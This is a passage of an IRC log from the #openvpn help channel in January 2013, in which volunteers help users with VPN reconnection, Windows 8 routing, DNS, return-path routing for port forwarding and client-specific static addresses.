17 04:00:00 2013 us=912281 /sbin/route del -net 0.0.0.0 netmask 128.0.0.0 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=913707 ERROR: Linux route delete command failed: could not execute external program 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=913995 /sbin/route del -net 128.0.0.0 netmask 128.0.0.0 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915425 ERROR: Linux route delete command failed: could not execute external program 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915612 Closing TUN/TAP interface 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915769 /sbin/ifconfig tun0 0.0.0.0 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=917192 Linux ip addr del failed: could not execute external program 12:16 <+pekster> Please don't do that 12:16 <+pekster> Use a pastebin 12:16 < Orbi> sorry 12:16 <+pekster> It's bad form on IRC because it's hard to read and detracts from conversation 12:17 < Orbi> I'll read into SIGUSR1 12:18 -!- nand` is now known as `nand` 12:18 <+pekster> That's probably all you need, although you'll need to stop downgrading your permissions if the server possibly hands you a new IP (looks like you're using --user and/or --group due to the failures to remove routes on disconnect.) 12:19 <+pekster> No need to SIGTERM and then re-launch the client instance as long as it's not completely exiting on you 12:20 < Orbi> I'm indeed running the client with reduced privileges 12:21 <+pekster> You can't do that if you expect a new IP from the server to work after a reconnect event 12:21 <+pekster> Either run an external script to configure routes/addressing for such cases, or don't downgrade permissino 12:21 <+pekster> permission* 12:21 < Orbi> Wouldn't SIGHUP work then? 12:22 <+pekster> No, because you require root access to set the tap IP 12:22 <+pekster> eg: try 'ip addr add 127.0.0.2/8 dev lo' as a non-root user and watch it fail 12:23 <+pekster> It might work with SIGUSR1 and --persist-key --persist-tun, but that will cause you problems if the server assigns you a new IP for whatever reason 12:23 < Orbi> Yes, it might SIGUSR1 -- Conditional restart, designed to restart without root privileges 12:24 < Orbi> It's my ISP's IP that changes daily 12:24 <+pekster> Read the --user option in the manpage, since you'll need the relevant --persist options for that to work 12:25 <+pekster> And you really want --float on the server-side if you expect that to do what you want 12:25 <+pekster> --keepalive will at least reconnect you even if that doesn't work 12:25 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:26 <+pekster> Then send the process a USR1 signal rather than the clunky term/wait/restart steps. You can probably hook into your distro's features for DHCP action to do that on-demand and not rely on cron to do it 12:26 <+pekster> (that's the cleaner solution) 12:26 < Orbi> even though my IP address changed? Doesn't the tun interface need to be closed since the ip address changed? 12:27 < Orbi> interesting solution, I'm really getting to learn all this stuff 12:27 <+pekster> Read the --persist-tun option. You can't use USR1 "soft-restarts" when dropping user privs 12:27 <+pekster> Manpage describes that very clearly in the --user option too 12:28 <+pekster> Read about those, SIGUSR1, and --float and you should be able to answer your own quetions 12:28 < Orbi> ok, so at some point it might be a tradeoff between user privileges and functionality? 12:30 < Orbi> I'll look into it, thanks for answering pekster 12:39 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has quit [Read error: Connection reset by peer] 12:50 -!- nameless` [~nameless@u1c.eu] has quit [Read error: Operation timed out] 12:50 -!- dvl [~dan@pdpc/supporter/active/dvl] has quit [Ping timeout: 255 seconds] 12:51 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn 12:51 -!- nameless` [~nameless@u1c.eu] has joined #openvpn 12:52 -!- mndo [~mndo@bl15-215-4.dsl.telepac.pt] has quit [Quit: going home] 12:52 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Remote host closed the connection] 12:54 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 12:56 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 12:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 255 seconds] 13:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 13:20 -!- raidz is now known as raidz_away 13:21 -!- raidz_away is now known as raidz 13:25 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds] 13:25 -!- APTX_ [~APTX@unaffiliated/aptx] has joined #openvpn 13:26 -!- mattock_ [~mattock@raidz.im] has joined #openvpn 13:26 -!- mattock_ [~mattock@raidz.im] has quit [Changing host] 13:26 -!- mattock_ [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 13:26 -!- mode/#openvpn [+o mattock_] by ChanServ 13:27 -!- sauce_ [sauce@ool-ad02ad20.dyn.optonline.net] has joined #openvpn 13:27 -!- thermoman_ [~thermoman@idle.foobar0815.de] has joined #openvpn 13:28 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 245 seconds] 13:28 -!- mattock_ is now known as mattock 13:30 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 260 seconds] 13:30 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 260 seconds] 13:30 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Ping timeout: 260 seconds] 13:30 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 260 seconds] 13:35 -!- dvl [~dan@nyi.unixathome.org] has quit [Changing host] 13:35 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn 13:36 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 13:54 < p47> I can not connect to vpn it says error and I made all I'm trying with ubuntu 13:54 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.] 13:54 < p47> does anbody here can help me ? 13:54 < ngharo> what says error 13:54 < p47> I'm trying to connect windows + ubuntu 13:55 < p47> ngharo, connecting to client has falied 13:59 -!- Radex [br@debian.pl] has left #openvpn [] 14:17 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 14:18 < Sickness\> I am connected to the openvpn network at my work from home, I'm trying to connect to a server using putty but it tells me the host does not exist (I only know the hostname of the box) 14:19 < Sickness\> this worked fine before without having to set anything additional 14:20 < Sickness\> I've tried pinging some boxes that I do know should be up but no luck and since I'm connected to the vpn I doubt its a fw issue (which is disabled atm btw) 14:20 <+pekster> Sickness\: Maybe they're not pushing DNS or it doesn't wnork for a variety of reasons (not properly updated in OS, or generic Windows DNS multihoming issues.) Try 'dig @ip-of-corporate-dns hostname-of-interest' (or do it via nslookup or your other favourite resolution tool) 14:22 <+pekster> Making DNS work for Windows clients in a corporate network is rather tricky, and I've written careful client-side code in the past for former employers to make it seemless to users due to the issues around it. You can read about the --register-dns option and add it to your client .ovpn file if you want to try it 14:22 < Sickness\> hm 14:22 < Sickness\> maybe it's windows 8 related, I'm not using that at work 14:23 < Sickness\> since there, it works flawlessly using the same methods (the actual vpn is on a foreign server) 14:23 <+pekster> Near as I could tell using the developer preview, OpenVPN worked on win8 like it did on 7 14:23 <+pekster> It's not like win8 really does anything fundamentally different than 7 besides metro anyway 14:24 < Sickness\> not when it comes to these things for as far as I know no 14:25 < Sickness\> hm, just realized the vpn network might be conflicting with the virtualbox network I have here 14:25 < Sickness\> nope 14:29 < Eduard_Munteanu> Hm, the connection setup code seems rather tightly-coupled with options. 14:31 < Eduard_Munteanu> Is there some helper I can use to set up a new server/client? init_instance seems to rely on option parsing to set up the context etc.. 14:31 -!- Aketzu [akolehma@kelvin.aketzu.net] has joined #openvpn 14:33 < Eduard_Munteanu> Maybe I should set up a whole new context. 14:34 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 14:35 < Eduard_Munteanu> Is there a developer channel, btw? 14:44 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn 14:45 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 14:46 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has joined #openvpn 14:47 < TechSmurf> Any ideas why I can't snmpwalk a device across a tunnel? 14:49 < Eduard_Munteanu> Ouch, the server multi-client code is a lot of code. 14:52 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 14:55 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 15:14 -!- Orbi [~opera@anon-163-28.vpn.ipredator.se] has quit [Ping timeout: 272 seconds] 15:15 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 15:16 < CrashTM> anyone home? 15:16 <+hazardous> dont think so 15:17 < CrashTM> >.> 15:17 <+hazardous> ? 15:18 < CrashTM> why must forwrding a port to a openvpn client be so hard 15:18 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 15:18 <+hazardous> lol what are trying to do 15:18 <+hazardous> i can help google or something but i don't really use openvpn so :x 15:19 < TechSmurf> correction: any ideas why I can't pass udp traffic across a tunnel? 15:19 < CrashTM> i will use minecraft for an example. if a client wanted to host a minecraft server it needs port 25565 to be open. 15:20 < CrashTM> the point of hosting it over a vpn is so that the public ip will not be the clients personal ip 15:21 < CrashTM> i have the server running and it works yet i am unable to forward all the traffic on port 25565 to the client 15:22 <+hazardous> dose the inbound traffic hit the client? 15:22 <+hazardous> in the first place 15:22 <+hazardous> might be return path thats the prob 15:23 < CrashTM> no, when connected to the vpn, the client can not be seen when trying to connect to it 15:23 < CrashTM> when the vpn is not enabeled i can connect to the server fine 15:24 < CrashTM> as soon as i connect it cannot be seen. 15:24 < CrashTM> i have setup static ips for my clients 15:30 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer] 15:35 -!- thermoman_ is now known as thermoman 15:36 < Sickness\> pff I finally did it on windows 8 15:37 < Sickness\> apparently windows 8 does do something fundamentally different compared to 7 pekster 15:37 < Sickness\> took me ~3 hours to get around this routing issue 15:38 < Sickness\> for anyone who's curious or might run into this in the future with windows 8 clients 15:38 < Sickness\> You need to install "RAS Connection Manager" as a windows feature (under programs and features) 15:38 < Sickness\> and add route-method exe to your openvpn config 15:39 <+pekster> I always use route-method exe with >=Vista 15:39 < Sickness\> I have never been forced to use it in Windows 7 over the past year ;( 15:40 <+pekster> Some of that might depend on local configuration 15:40 <+pekster> RRAS shouldn't ever be required to act as a client; I suspect something else was going on 15:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:40 <+pekster> I did test the dev preview of Win8, and it added routes normally, at least for a tun setup where I pushed a couple routes along with the connection 15:41 < Sickness\> well this was the only method I got working 15:42 < Sickness\> I have no idea why but installing the RAS connection manager admin kit helped 15:42 < Sickness\> Oh well, just happy it works now, now I can finally fix that live bug :P 15:43 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds] 15:47 < CrashTM> anyone? 15:48 < TechSmurf> figured it out.. for some reason the return path was different for snmpwalk than ping 15:49 * TechSmurf thinks 15:49 < TechSmurf> no, ping just didn't care 15:49 < TechSmurf> either way it was sourcing from the tun interface ip, which I hadn't accounted for 15:50 < TechSmurf> dunno why iperf failed over udp, but whatever. snmp is working :P 15:51 <+pekster> CrashTM: If you're forwarding a port on the VPN server's public IP to a VPN client, how are you handling the return routing? 15:52 < CrashTM> great question 15:52 < CrashTM> no idea 15:52 < CrashTM> XD 15:52 <+pekster> You need the client to route the reply packets back across the VPN 15:53 < CrashTM> any idea on how i might do that? 15:53 <+pekster> Either redirect all client traffic via --redirect-gateway, or set up policy routing 15:53 < CrashTM> ok 15:55 <+pekster> Pretty sure you've been shown that a few times before 15:55 <+pekster> Some basic routing knowledge will make your life a lot easier. A lack of understanding why you need your return route for the client's reply traffic across the VPN is going to make understanding what is wrong very hard 15:55 <+pekster> !tcpip 15:55 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 15:56 * TechSmurf nods 15:57 < TechSmurf> basically the traffic has to come back along its original route 15:58 <+pekster> Well, that's not completely true, but it needs to be sourced from the same IP as the original request was bound to 15:58 < TechSmurf> if A sends data to B and expects a reply from B, it won't know what to do if the reply comes from C instead. 15:58 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 15:58 <+pekster> (which in his case means the same thing) 15:58 < Eduard_Munteanu> Depends on rp_filter. 15:58 < TechSmurf> pekster: in my head it just visualizes nicely as a line-return vs loop-return 15:59 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds] 15:59 < TechSmurf> but yeah, the point is the replying ip has to match the original dest ip 15:59 <+pekster> Sure, but the reality of the Internet is that 2 packets send right after one another (and each of their return packets) can take different routes depending on network conditions and any issues along the wa 15:59 <+pekster> But yea, the endpoints don't care about routing path, just the IPs/ports matching expected values 15:59 < TechSmurf> as long as none of them somehow get routed over level3 I'm ok. 16:00 < TechSmurf> :P 16:00 < TechSmurf> I really hope that sentiment of mine is outdated and level3 has improved ;) 16:00 <+pekster> I'll keep you off layer3.net and send you through 12 Chinese gateways instead ;) 16:00 <+hazardous> nothing wrong with level3 16:00 < TechSmurf> might be layer3 16:00 <+hazardous> if anything i'd like to yell at cogent 16:01 < TechSmurf> I dunno. back around 2000 when I was mudding one of the backbones was a haven of lag 16:01 <+hazardous> cogent routed me from norcal -> texas -> chicago -> ny -> uk -> germany -> singapore -> aus 16:01 <+hazardous> i just.. i don't know 16:01 < TechSmurf> ouch. 16:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 16:01 -!- p47 [~p47@189.134.208.202] has quit [Quit: Saliendo] 16:01 <+hazardous> that was an amazing 500ms though 16:01 < TechSmurf> :| 16:01 <+hazardous> instead of just going down to sj or la and going over peering 16:01 <+hazardous> at 130-150 16:02 <+hazardous> laughed pretty hard 16:02 <+hazardous> also on another server, ny to nj went through washington dc and chicago 16:02 <+hazardous> cogent -> telia -> he -> telia -> cogent 16:02 < TechSmurf> I like my route to that mud these days.. 16:02 < TechSmurf> twtc -> twtc 16:03 <+hazardous> cable or telecom 16:03 < TechSmurf> tc 16:03 <+hazardous> twtelecom.net is entirely unrelated to time warner cable 16:03 <+hazardous> also what's a mud 16:03 < TechSmurf> text rpg 16:05 < TechSmurf> what irc is to skype, muds are to WoW 16:06 < Eduard_Munteanu> Heh, nice description. 16:06 < Eduard_Munteanu> (stands for multi-user dungeon, btw) 16:06 <+pekster> Ugh, beat me to that :P 16:06 < TechSmurf> (or mush,muck,moo,whatever) 16:07 < TechSmurf> multi-user shared hallucination... 16:07 < TechSmurf> props to whoever coined that one 16:08 < TechSmurf> twtelecom is entirely unrelated to time warner anything anymore 16:09 < TechSmurf> afaik 16:09 < TechSmurf> they were real big on that name change a few years back 16:10 < TechSmurf> regardless, they were the first company to agree to a fiber buildout for us. 16:10 < TechSmurf> it was merely convenient that they already had our t1 16:16 -!- WaffleScratch [~chatzilla@S010600226b8a7cc5.vn.shawcable.net] has joined #openvpn 16:16 < TechSmurf> thanks folks! 16:16 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has left #openvpn [] 16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:25 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn 16:31 -!- dazo is now known as dazo_afk 16:38 -!- WaffleScratch [~chatzilla@S010600226b8a7cc5.vn.shawcable.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]] 16:43 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 16:46 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 16:47 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:50 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Ping timeout: 256 seconds] 16:53 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn 17:14 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 17:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:18 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 17:19 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:21 -!- digilink [~digilink@unaffiliated/digilink] has quit [Read error: Operation timed out] 17:26 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 17:26 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 17:27 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving] 17:53 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 17:56 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 18:13 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 18:32 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 18:32 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has quit [Ping timeout: 255 seconds] 18:33 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has joined #openvpn 18:33 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 256 seconds] 18:34 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has left #openvpn ["WeeChat 0.3.0"] 18:54 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has joined #openvpn 18:54 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has quit [Max SendQ exceeded] 18:55 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has joined #openvpn 19:00 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has quit [Ping timeout: 260 seconds] 19:02 -!- zaki [~guest@93.98.88.82] has quit [Remote host closed the connection] 19:12 -!- p3rror [~mezgani@2001:0:53aa:64c:3c41:646c:d606:ead9] has joined #openvpn 19:17 -!- p3rror [~mezgani@2001:0:53aa:64c:3c41:646c:d606:ead9] has quit [Ping timeout: 260 seconds] 19:21 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:27 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds] 19:30 -!- p3rror [~mezgani@2001:0:53aa:64c:30:646c:d673:9b7d] has joined #openvpn 19:31 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has quit [Read error: Operation timed out] 19:39 -!- p3rror [~mezgani@2001:0:53aa:64c:30:646c:d673:9b7d] has quit [Ping timeout: 260 seconds] 19:52 -!- pnielsen_ is now known as pnielsen 19:55 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has quit [Quit: Leaving] 19:55 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 20:01 -!- raidz is now known as raidz_away 20:40 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 20:40 < Wulf> Hi 20:41 < Wulf> Trying to setup openvpn. All packets sent to the remote are not delivered. tcpdump shows them on the tun0 interface, but they are not sent on. The other way round works fine 20:42 < Wulf> what is it that I might be doing wrong? 20:47 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 20:56 <+hazardous> iptables rules ? 20:56 <+hazardous> masq / snat / whatever? 21:16 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 256 seconds] 21:34 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 21:38 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Operation timed out] 23:18 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Ping timeout: 245 seconds] 23:22 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 23:33 -!- brute11k [~brute11k@89.249.235.236] has quit [Ping timeout: 276 seconds] 23:36 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Ping timeout: 276 seconds] 23:37 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 23:57 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn --- Day changed Fri Jan 18 2013 00:07 < kunji> Mmmk, well I have the bridge into the network working now, even the UPnP server is working great. What isn't working is getting back out, or more likely back in, from the Internet, can't even ping by ip some on the internet going through the vpn. OpenVPN Server (192.168.1.103, giving out addresses 192.168.1.50 through 192.168.1.99) <-> Gateway Router (192.168.1.1 giving out addresses 192.168.1.100 through 192.168.1.200)<-> Modem (SomeIP) 00:49 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 252 seconds] 00:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 01:02 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 01:02 <+pekster> kunji: What is your goal? 01:02 <+pekster> !goal 01:02 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 01:15 < kunji> pekster: Ah sorry, you and I have talked about this one before, the immediate goal would be to be able to communicate to and from the internet through the vpn, which is up and working. I know that the bridged vpn may not be suitable for all uses (for instance, yes, a SOCKS proxy would probably have been more suitable for this portion of my original goals), but by now the goal is as much just learning and figuring out how to make it work a 01:24 -!- raidz_away is now known as raidz 01:26 -!- raidz is now known as raidz_away 01:28 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds] 01:29 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 01:29 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 252 seconds] 01:29 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded] 01:29 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 01:33 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds] 01:46 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 01:55 -!- p3rror [~mezgani@2001:0:53aa:64c:38a7:692d:d607:23fb] has joined #openvpn 02:12 -!- p3rror [~mezgani@2001:0:53aa:64c:38a7:692d:d607:23fb] has quit [Ping timeout: 260 seconds] 02:18 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has joined #openvpn 02:18 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has quit [Changing host] 02:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds] 03:36 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:40 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds] 03:45 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 03:48 < EugeneKay> !redirect 03:48 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 03:48 <@vpnHelper> http://ircpimps.org/redirect.png 03:56 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 03:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 04:02 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded] 04:12 -!- brute11k [~brute11k@89.249.230.224] has joined #openvpn 04:13 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer] 04:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:17 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 04:20 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 04:21 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded] 04:22 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 04:23 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 276 seconds] 04:24 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded] 04:25 -!- dazo_afk is now known as dazo 04:25 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 04:29 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 05:16 -!- larseberhart [~larseberh@77.116.246.247] has joined #openvpn 05:16 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 05:17 -!- larseberhart [~larseberh@77.116.246.247] has left #openvpn [] 05:17 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 05:23 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn 05:30 -!- corretico [~luis@190.211.93.38] has joined #openvpn 05:34 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has joined #openvpn 05:34 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has quit [Changing host] 05:34 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:42 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 05:53 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 06:03 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 06:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 06:16 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 06:41 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 06:43 -!- [fred]_ [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 06:44 -!- [fred] [fred@konfuzi.us] has joined #openvpn 07:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds] 07:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Remote host closed the connection] 07:19 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn 07:25 -!- samba35 [~shrikant@unaffiliated/samba35] has joined #openvpn 07:25 -!- corretico [~luis@190.211.93.38] has quit [Quit: Leaving] 07:25 < samba35> d12fk, hi 07:26 -!- corretico [~luis@190.211.93.38] has joined #openvpn 07:43 -!- larseberhart [~larseberh@212095007036.public.telering.at] has joined #openvpn 07:45 -!- larseberhart [~larseberh@212095007036.public.telering.at] has quit [Client Quit] 07:47 < mjixx_> does the redirect-gateway option work with ipv6? 07:48 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:48 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn [] 07:48 -!- desmo [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:49 < desmo> can openvpn on windows run a client and a server ovpn file with the server process at the same time? 07:51 <+rob0> desmo, probably, but the necessity that you know what you're doing (understand IP routing) will increase dramatically. 07:54 < desmo> rob0, you mean because of the route looping? 07:57 <+rob0> that could happen! 07:58 < Rienzilla> yeah i'm quite certain it's possible 07:58 < Rienzilla> and fully support rob0's statement :D 07:59 < desmo> ya, i have seen it too, it is a most obvious routing issue ;) 08:04 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 08:14 < dioz> looping routes? 08:16 -!- brute11k [~brute11k@89.249.230.224] has quit [Ping timeout: 255 seconds] 08:17 < desmo> like when you have a router referring subnet routes to a subnet that has a router(sometimes a dhcp server) that refers back to the first router 08:19 -!- brute11k [~brute11k@89.249.231.136] has joined #openvpn 08:32 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 08:32 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer] 08:36 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 08:37 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn [] 08:48 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 08:58 -!- Netsplit *.net <-> *.split quits: Sickness\ 09:00 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 09:01 <+pekster> desmo: I do that sometimes to test platform operation on Windows; the only real trick is to use 'nobind' if you're connecting to the loopback adapter 09:01 <+pekster> (and of course you need a 2nd tap device, via 'tap-windows.exe' in 2.3.0 since it's missing the 'addtap.bat' utility by default 09:05 < BasicXP> Good time of the day, everyone! Got a problem here regarding client configuration directory. Followed the manual on the website on how to assign static addresses to clients. 09:05 <@ecrist> morning, folks 09:05 < BasicXP> However whatever I do, the client still receives wrong addresses (IPv4 and IPv6). 09:05 < BasicXP> Could that be because the CN has a space in it? 09:06 < BasicXP> Thanks in advance for any help or advice. 09:08 <+pekster> BasicXP: See the section in the manpage listed under 'String Remapping' 09:08 <+rob0> Heh. Why are you putting spaces in CNs? :) Unix filenames can have spaces, also, but those must be escaped. 09:09 <@ecrist> 